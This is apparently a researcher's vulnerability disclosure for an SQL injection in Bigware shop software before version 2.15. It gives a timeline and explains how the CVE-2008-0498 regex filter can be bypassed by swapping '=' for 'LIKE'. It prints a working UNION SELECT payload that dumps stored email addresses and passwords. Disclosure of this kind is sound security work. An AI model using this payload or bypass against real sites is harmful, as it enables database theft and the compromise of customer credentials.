SQL injection 53.php

Summary main_bigware_53.php

The Bigware shop software prior to version 2.15 contains a SQL injection, resulting in full database compromise. The patch for CVE2008-0498 can be circumvented by replacing the '=' sign with 'like'.

Proof of concept:

Original exploit (see exploit-db.com/exploits/5002/):


Modified (and cleaned up) exploit:

main_bigware_53.php?op=results&pollid=-1 AND voteid=0 AND language_id=5
AND 1 LIKE 1 UNION SELECT GROUP_CONCAT(former_groups_id, char(58),
former_email_address,char(58), former_password) FROM former --

Time line:

12/10/2011: Vendor contacted
12/10/2011: Vendor response
12/18/2011: Vendor patch release
12/19/2011: Vendor requested time to notify customers
01/23/2012: Disclosure


Input sanitation

During the work on the SQL injection in main_bigware_43.php I stumbled over the patch for CVE2008-0498. It was a script named 'stop_injections.php' with the code (error messages truncated):

$SQLInjectionRegexOR = '/[\'")]* *[o][r] *.*(.)(.) *= *\\2(?:--)?\\1?/i';
$suspiciousQueryItemsOR = preg_grep($SQLInjectionRegexOR, $_REQUEST);
if (!empty($suspiciousQueryItemsOR)) die('This is not allowed. If you believe we  …');
$SQLInjectionRegexAND = '/[\'")]* *[a][n][d] *.*(.)(.) *= *\\2(?:--)?\\1?/i'
$suspiciousQueryItemsAND = preg_grep($SQLInjectionRegexAND, $_REQUEST);
if (!empty($suspiciousQueryItemsAND)) die('This is not allowed. If you believe …');

My regex knowledge sucks a bit and I was not sure, so I contacted a good friend. He looked at the regex and told me that the expressions just looks for 'or'/'and“ plus '=' somewhere. And what happens if I use 'like' instead of '='? Correct, the filter does not apply. Hint: sqlmap contains a tamper script 'equaltolike.py'.